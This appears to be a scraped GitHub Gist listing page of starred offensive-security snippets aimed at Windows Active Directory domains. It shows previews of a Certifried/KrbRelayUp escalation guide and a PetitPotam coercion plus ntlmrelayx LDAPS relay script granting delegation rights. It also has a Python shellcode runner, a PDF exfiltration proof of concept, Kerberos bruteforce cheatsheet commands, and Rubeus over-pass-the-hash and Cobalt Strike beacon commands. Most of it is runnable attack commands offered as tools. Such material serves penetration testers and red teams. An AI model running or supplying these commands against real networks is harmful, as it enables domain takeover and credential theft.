Skip to content

Instantly share code, notes, and snippets.

View amirr0r's full-sized avatar

Mimiron amirr0r

26 followers · 63 following
View GitHub Profile
@dirkjanm
dirkjanm / schemaquery.py
Created July 11, 2022 15:55
Query property sets from the AD schema
#!/usr/bin/env python
####################
#
# Copyright (c) 2022 Dirk-jan Mollema (@_dirkjan)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
@tothi
tothi / certifried_with_krbrelayup.md
Last active December 18, 2024 19:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@zimnyaa
zimnyaa / webclient-rbcd.sh
Last active February 28, 2025 09:18
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up a LDAPS relay to grant RBCD to computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
@peewpw
peewpw / shellcode_x64.py
Created May 12, 2020 16:03
64 bit Python3 compatible shellcode runner
# 64 bit compatible shellcode launcher
#
# The versions of this I've attempted to use appear to only work in 32bit Python (at least for 3.7-8).
# Hence why this was neede to solve a problem.
#
# based on work from:
# http://www.debasish.in/2012/04/execute-shellcode-using-python.html
# https://www.christophertruncer.com/shellcode-manipulation-and-injection-in-python-3/
# https://stackoverflow.com/a/61258392
#
@Areizen
Areizen / mupdf_encrypted_exfiltration.py
Created April 30, 2020 17:48
POC of pdf-insecurity.com
from binascii import hexlify
import sys
import re
# PDF TEMPLATE, index number should be shifted enough to avoid collision with number of the object
# we want to exfiltrate
PDF_TEMPLATE = """%PDF-2.0
100 0 obj
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@seajaysec
seajaysec / customqueries.json
Last active February 12, 2025 16:58
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active September 29, 2024 12:57
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@Ari-Roda
Ari-Roda / scapy
Created September 17, 2018 08:16
from scapy.all import * #import scapy module to python
from sklearn.externals import joblib
import pandas as pd
thisdict = { 1:"icmp",3:"ggp",6: "tcp", 11:"nvp", 12:"pup", 17: "udp", 28:"irtp",39: "tp++", 41:"ipv6" , 42:"sdrp",46:"rsvp", 47: "gre", 53: "swipe" ,55:"mobile" , 56: "tlsp", 57: "skip" , 59:"ipv6-no", 77: "sun-nd", 87: "tcf" ,89: "ospf", 103: "pim", 105:"scps",129:"iplt", 132: "sctp",
133:"fc", 82:"secure-vmtp", 94:"ipip", 108:"ipcomp", 85:"nsfnet-igp", 100:"gmtp", 25:"leaf-1", 98:"encap", 95:"micp", 84:"ttp",86:"dgp", 32:"merit-inp", 10: "bbn-rcc", 109:"snp", 15:"xnet",
44:"ipv6-frag", 79:"wb-expak", 69:"sat-mon", 7:"cbt", 107:"a/n", 23:"trunk-1", 70:"visa", 27:"rdp", 18:"mux", 104:"aris", 20:"hmp", 75:"pvp", 64:"sat-expak", 121:"smp", 22:"xns-idp", 30:"netblt",
126:"crtp", 16:"chaos", 131:"pipe", 31:"mfe-nsp", 40:"il", 110:"compaq-peer", 92:"mtp", 120:"uti", 90:"sprite-rpc", 24:"trunk-2", 74:"wsn", 37:"ddp", 76:"br-sat-mon",80:"iso-ip", 8:"egp",